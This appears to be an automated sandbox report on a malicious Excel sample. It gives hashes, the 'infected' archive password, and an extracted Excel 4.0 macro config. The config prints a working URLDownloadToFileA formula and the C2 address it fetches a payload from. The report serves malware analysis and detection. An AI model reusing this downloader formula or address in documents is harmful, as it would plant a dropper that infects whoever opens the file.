Behavioral task
behavioral1
Sample
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
5527146056155136.zip
-
Size
11KB
-
MD5
bda336dfdf5f1db4824bbe1650f7b7cc
-
SHA1
6767e6b4ea3f2df27fa645af10424e86b8ab4041
-
SHA256
bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0
-
SHA512
e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a
Malware Config
Extracted
Rule
Excel 4.0 XLM Macro
C2
http://xjw10whta03ytgdi.com/inda.xls
Attributes
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)
Signatures
Files
-
5527146056155136.zip.zip
Password: infected
-
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls windows office2003